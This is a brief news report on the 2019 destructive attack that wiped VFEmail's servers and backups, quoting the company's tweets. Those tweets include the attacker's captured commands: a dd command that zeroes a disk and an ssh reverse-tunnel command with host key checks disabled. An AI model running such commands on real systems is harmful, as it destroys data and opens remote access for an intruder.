Unknown hackers cyber attack on email Provider company VFEmail.net.
Company confirmed that data was encrypted, but it doesn’t matter. They just format everything.”
VFEmail is an service to provide free and premium business email. Currently the website service is down and does not connect to server.
They tweeted yesterday,
“This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.”
“nl101 is up, but no incoming email. I fear all US based data may be lost.”
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019
“At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.”
“Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.”
“This is all I can do at this time. I will need to get into the data center to see if the one file server I caught during formatting can be recovered. If it can, we can restore mail, but most of the infrastructure is lost.”
Yesterday, the Company notified the cyber attack on its server and web-mail client went down without notice. Currently they are working to recover users email, mostly hackers are usually compromised servers for other malicious activity. But it’s all data of US customers have been deleted, both primary and backup systems.
In November 2015, VFEmail were targeted by group of hacker who demanded payment from victim companies.